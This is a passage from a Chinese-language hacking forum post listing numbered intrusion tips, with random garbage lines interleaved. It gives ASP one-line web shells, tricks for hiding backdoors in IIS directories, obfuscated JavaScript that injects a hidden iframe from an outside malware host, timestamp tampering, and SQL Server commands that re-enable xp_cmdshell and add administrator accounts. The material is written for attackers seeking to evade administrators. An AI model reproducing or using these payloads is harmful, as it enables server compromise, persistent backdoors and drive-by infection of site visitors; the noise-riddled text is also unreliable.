d).<script language=VBScript runat=server>execute request("sb")</Script>
, U$ |! u6 j' \( r- r
e).<%25Execute(request("l"))%25>
8 e5 b5 z* {. b8 t3 r: \1 }
f).<%if request("cmd")<>"" then execute request("pass")%>
6 V% @& l+ v; c, M
5 e8 ?8 a/ a& l9 @2 G0 _
52、at "12:17" /interactive cmd
9 t% m2 k9 T5 V: w+ ?. M% c
执行后可以用AT命令查看新加的任务
# V8 d" R7 T' X
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
9 `: L7 Q, P. K' f
" n2 b8 r- A. p
53、隐藏ASP后门的两种方法
/ B) J" X7 l3 ^% y3 v
1、建立非标准目录:mkdir images..\
' L- S2 v4 g) z
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
" B# e8 T$ V7 V6 ~) k" m
通过web访问ASP木马:http://ip/images../news.asp?action=login
: t- P& ^7 A* T( x% T
如何删除非标准目录:rmdir images..\ /s
/ m( j/ @# I1 g0 D. Q
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
) i5 o5 C+ j; s6 h( P A& j% u
mkdir programme.asp
7 t' k+ S5 u( Z
新建1.txt文件内容:<!--#include file=”12.jpg”-->
7 a. w" ^" B9 ~# A# S1 c% \; \5 b
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
9 D" a p; D, I8 G2 h6 s, c; \
attrib +H +S programme.asp
1 A* r, G6 c2 K, D5 {/ k- \
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
" }3 f# S' O* b, q) |
- C+ ~# h/ `% i
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
0 J! i- n" G' R& Q! T, J" O
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
5 q9 k: _+ N u: w) @
! I- ?. X# `' F
55、JS隐蔽挂马
t1 o) h1 G b$ J$ \
1.
/ d% P. Z5 y" \- F% [
var tr4c3="<iframe src=ht";
5 V7 d% ~/ {' W/ d" L# }
tr4c3 = tr4c3+"tp:/";
$ u/ s j' E" e6 o3 b! f% [7 M
tr4c3 = tr4c3+"/ww";
2 X$ |/ A6 Y" f N% y$ i
tr4c3 = tr4c3+"w.tr4";
# A, m8 ]. |/ r8 [* G5 g
tr4c3 = tr4c3+"c3.com/inc/m";
: Y! t# E# Z9 H3 w( }
tr4c3 = tr4c3+"m.htm style="display:none"></i";
% D$ N& g; _) B* O8 j: ]
tr4c3 =tr4c3+"frame>'";
5 u0 d; @; E" ?' ^) w
document.write(tr4c3);
2 v3 S' o* m3 }; K9 g
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
# @0 ` C% N& Y6 r4 v
) s+ M' J- J( u/ {
2.
f5 S9 F8 |4 y6 d2 E
转换进制,然后用EVAL执行。如
- l* \! E6 h7 f4 r: Y
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
2 H; E5 R6 `$ U* |" t* T
不过这个有点显眼。
3 L7 Z( ]; N5 k! X% j
3.
@( K9 l& E: @+ A- t4 x
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' |+ g4 r) O) T* s& Q
最后一点,别忘了把文件的时间也修改下。
* u8 D( j% _2 T/ O0 F
8 I a$ w" Z' ?4 p b
56.3389终端入侵常用DOS命令
2 N! ]/ o& Z7 ?5 p* f
taskkill taskkill /PID 1248 /t
9 |; b8 J7 c* @( W% K! [
& w. j( n: b$ ?$ y
tasklist 查进程
" X: z2 ^6 W4 K' @+ N% o; b' P7 w8 R
/ @. @. [8 z* E8 j1 b
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
" {' o P$ L( V) V! x2 L
iisreset /reboot
+ @8 U0 m! X% k( U) X; f e
tsshutdn /reboot /delay:1 重起服务器
" Z' \! x+ X- Z
' t H, @5 q+ |8 c
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ U, q; F- ?( B4 N5 O! o0 p" X
* t! W( C( Q# ^: q7 c) `& q
query user 查看当前终端用户在线情况
! e# G6 r$ M, G7 ^: y
; \ i ~ a4 i q# L" b- R1 N& S& z
要显示有关所有会话使用的进程的信息,请键入:query process *
" k6 L5 k8 h/ m# y: X7 j
# u, Y- n! W& J, X
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
3 G6 Z( u P' v1 @1 [
" q, h( q" u% H) b
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
. d& _4 m; t; _
! u# u! c5 w% d9 x4 R
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 _* m2 W( m+ u; H8 U
5 r0 D4 z& O8 N5 i4 U7 N
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% n( z0 h: G* J2 k: A, p
$ x9 L1 [/ ~- C/ t- l% v
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
; G+ ~" ~, [, |; q8 q" j
/ e; l3 U. D0 p K0 U3 U/ v7 J0 O
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
# _3 x0 s9 u9 Q/ r G
2 R8 D+ f' i+ w) s
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
& H1 Q7 x m6 T( G
: T# ~7 ^& ~: Z. x* O2 r$ b
56、在地址栏或按Ctrl+O,输入:
& P( Y* j7 `, H4 I
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
4 z& d8 p) I( q6 e
8 d" C/ u6 Y! [4 n
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
' M* o7 ]1 n& V4 a
" d( p* Q5 |4 i! x7 B0 w
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
3 k+ N6 d5 _0 \! h4 p2 T7 G% k) V
用net localgroup administrators是可以看到管理组下,加了$的用户的。
- b7 k* x9 A% O$ { f. X
4 ~/ v/ j N, M8 e1 I7 K$ Z; v
58、 sa弱口令相关命令
a5 m2 C$ f7 K6 c$ ^$ ~
7 n9 f% n6 q; O* W
一.更改sa口令方法:
7 M0 E% A6 L G, d, \
用sql综合利用工具连接后,执行命令:
( w, r: Y* j/ D: y! D- i e: I" T
exec sp_password NULL,'20001001','sa'
\' |* x0 v: P- o2 w6 Q1 v
(提示:慎用!)
6 i4 j, c' @+ m# f# O
! e5 r$ ]3 v+ D5 r. h) z/ ^/ I
二.简单修补sa弱口令.
* @0 Q1 t- C6 V$ M, Q9 |( L
7 ]! W3 D r2 ~+ W3 j) M. }5 S
方法1:查询分离器连接后执行:
/ j1 [0 s- m4 O/ P% _
if exists (select * from
9 a$ x: a3 U: t/ I4 c6 O
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
a! A) }* }+ i: L
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
, c5 a/ R+ D4 a& F9 O9 t2 ^1 o
, t& |$ R2 D, d( U9 [, z9 g
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
/ K. g; f3 m: V
7 P9 x% ~9 @. c7 F/ Q9 Y# n/ V7 t
GO
; ?+ e* a4 f/ P/ G O
7 [0 S3 C/ J# a6 ?, Z$ b
然后按F5键命令执行完毕
* ^* R* K, N& \! |* Y8 {- l
' g1 Z* L9 e, t
方法2:查询分离器连接后
7 x) t$ e9 X5 G3 d
第一步执行:use master
; L# }' Z" ]! L$ E
第二步执行:sp_dropextendedproc 'xp_cmdshell'
& }6 E! A0 G: c3 a2 F, o$ V
然后按F5键命令执行完毕
7 C' N: D7 c! _, D# d
9 R" t2 S+ P- t
: Y. v% U1 L$ t0 W0 \
三.常见情况恢复执行xp_cmdshell.
r2 E; ]+ c& T0 r1 ~
& Z! i* ?% t) v6 F* t
# q% ~7 k6 o5 w
1 未能找到存储过程'master..xpcmdshell'.
3 {% p4 ~; H8 ?5 l. M2 q8 D
恢复方法:查询分离器连接后,
; e3 w, m. }+ J/ |
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ e7 P' Q9 {. Y7 @
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
; ~$ ]! ?# p" v) s
然后按F5键命令执行完毕
6 {. l8 e) v) I; N) |: C
$ h/ J6 [6 ?; \* m9 ]+ R
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
" ?; s( x0 B' t
恢复方法:查询分离器连接后,
8 |/ s% k8 c6 P: A+ T0 l& M' n
第一步执行:sp_dropextendedproc "xp_cmdshell"
! T6 a: B* j& ?# I$ ~; p
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" U7 C" `5 }% T4 p+ x
然后按F5键命令执行完毕
/ r% y, |) H4 z) f+ R
& m/ v& ^9 z) d
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" J, e* x( e% ]( y8 J0 \. d
恢复方法:查询分离器连接后,
5 ?% v# I( T! U6 e4 T8 H- Z2 H
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% c& T2 J Y; d9 n7 }
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
& |8 ]' `8 }- @9 H. P
然后按F5键命令执行完毕
' @+ p* ^5 d% g. s- Z1 {* M& k
3 w5 _( ?$ I( U! T/ E( _ M2 f
四.终极方法.
9 R! i( Y; v Q$ ~
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 O% v6 c+ A. i0 S1 L/ g# t
查询分离器连接后,
; n6 P9 c q) {9 @8 K, e
2000servser系统:
7 P# x$ t; q: R
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
8 h+ H) B9 n" A2 T1 S& Z( }9 O
7 X+ f ^: I g. L" g ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( I2 D; h! o4 I' N) t3 t
o( ?' z6 l8 A3 z, _/ _/ T, g( t
xp或2003server系统:
& R! S# [, E7 n2 R( O* h0 W4 k: b( f
3 H- C3 a6 ^5 @4 m! z' D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
) C- ]' `/ @: M: z* P
0 T3 O& Y' P. f* p' [: `* N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
! y% w8 i1 c2 R# t% Z1 Z% y4 F; r
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2